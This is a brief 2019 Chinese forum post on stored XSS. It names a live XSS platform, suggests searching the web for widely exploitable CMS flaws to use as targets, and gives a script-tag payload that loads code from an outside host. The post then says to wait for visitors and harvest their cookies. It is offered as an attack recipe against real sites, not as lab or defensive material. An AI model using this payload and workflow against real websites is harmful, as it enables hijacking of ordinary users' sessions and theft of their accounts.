存储XSS

繁夜   ·   发表于 2019-02-15 15:20:12   ·   技术文章投稿区

XSS的本质就是用户的输入输出被当成前端JS代码执行了,那么存储型和其他XSS区别在于他会储存到服务器里面去,危害是XSS中最大的。

我们首先需要一个XSS平台http://xss.tf/index.php?do=login这个平台可以帮我们做出很多的JS功能,我们只要把JS语句插进去那么就可以无所不能。只要JS能实现的,在这里我们都可以实现。

靶场的话可以百度查找cms通杀漏洞找到之后我们可以插入自己的XSS代码:

<script src=http://xxx/xxxxx></script>


然后等待其他人访问吗,通过XSS平台拿到cookie

打赏我,让我更有动力~

0 Reply   |  Until 2019-2-15 | 963 View
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2022 掌控者 All Rights Reserved.